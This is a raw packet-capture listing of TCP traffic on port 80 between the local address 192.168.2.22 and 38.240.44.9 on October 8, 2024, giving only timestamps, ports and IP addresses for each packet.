                                                                                                                                                                                              Oct 8, 2024 15:37:51.969501019 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.969512939 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.969525099 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.969554901 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:51.971857071 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.971868038 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.971879005 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:51.971906900 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.055213928 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.055411100 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167320013 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167341948 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167354107 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167395115 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167481899 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167494059 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167504072 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167515039 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167524099 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167537928 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167730093 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167742968 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167748928 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167767048 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167778015 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167779922 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167789936 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167794943 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167812109 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167819023 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167824030 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167834044 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167845011 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167865038 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167926073 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167936087 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167947054 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167958021 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167968035 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167968035 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167983055 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.167989016 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168000937 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168057919 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168092966 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168128014 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168139935 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168169022 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168201923 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168212891 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168222904 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168234110 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168241978 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168267012 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168384075 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168395996 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168406963 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168416977 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168426991 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168453932 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168704033 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168715954 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168725967 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168736935 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168747902 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168762922 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168853998 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168864965 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168875933 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168885946 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168895006 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168896914 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168906927 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168910027 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.168943882 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.169061899 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.169135094 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.169147015 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.169169903 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.169194937 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.169205904 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.169215918 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.169225931 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.169226885 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.169248104 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.172905922 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.172924995 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.172935009 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.172947884 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.172971964 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.173055887 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.173070908 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.173082113 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.173099041 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.173106909 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.173110962 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.173116922 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.173127890 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.173139095 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.173140049 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.173163891 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.366981983 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.366996050 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367012024 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367032051 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367059946 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367162943 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367172956 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367185116 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367194891 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367197990 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367208004 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367233038 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367372990 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367393017 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367407084 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367417097 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367427111 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367436886 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367449045 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367455959 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367460012 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367472887 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367480993 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367501020 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367841959 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367852926 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367862940 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367873907 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367885113 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367887020 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367896080 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367904902 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367908001 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367924929 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367954969 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367966890 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367979050 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367986917 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.367990017 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368004084 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368006945 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368031979 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368092060 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368103027 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368113041 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368123055 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368134022 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368135929 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368144989 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368154049 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368155956 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368170023 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368175983 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368187904 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368197918 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368206024 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368210077 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368221998 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368256092 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368264914 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368275881 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368282080 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368287086 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368304014 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368334055 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368344069 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368369102 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368511915 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368521929 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368531942 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368542910 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368546009 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368555069 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368558884 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368566990 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368577957 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368583918 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368611097 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368779898 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368791103 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368802071 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368810892 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368819952 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368822098 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368834019 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368844986 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368845940 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368858099 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368864059 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368896008 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368920088 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368936062 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368947029 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368957043 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368966103 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368967056 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368978977 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368988037 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.368992090 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369004011 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369010925 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369021893 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369034052 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369203091 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369218111 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369229078 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369235992 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369240046 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369251013 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369260073 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369262934 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369276047 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369282961 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369287014 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369297981 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369307995 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369307995 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369328022 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369620085 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369631052 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369641066 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369657040 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369666100 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369668961 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369678020 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369688988 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369699955 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369708061 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369730949 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369776964 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369787931 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.369823933 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.570565939 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.570585012 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.570597887 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.570632935 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.570647001 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.570660114 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.570679903 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.570796013 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.570807934 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.570818901 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.570828915 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.570830107 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.570839882 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.570852041 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.570852041 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.570863962 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.570882082 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.570888042 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.570916891 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.570947886 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.570960045 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.570971012 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.570988894 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.570990086 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571022987 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571060896 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571072102 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571103096 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571172953 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571233988 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571244955 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571255922 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571264982 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571280003 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571424007 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571434975 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571445942 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571455956 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571466923 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571474075 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571477890 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571487904 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571491957 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571504116 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571521044 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571521044 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571533918 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571533918 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571547031 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571557045 CEST804917738.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571564913 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571593046 CEST4917780192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:52.571624994 CEST804917738.240.44.9192.168.2.22
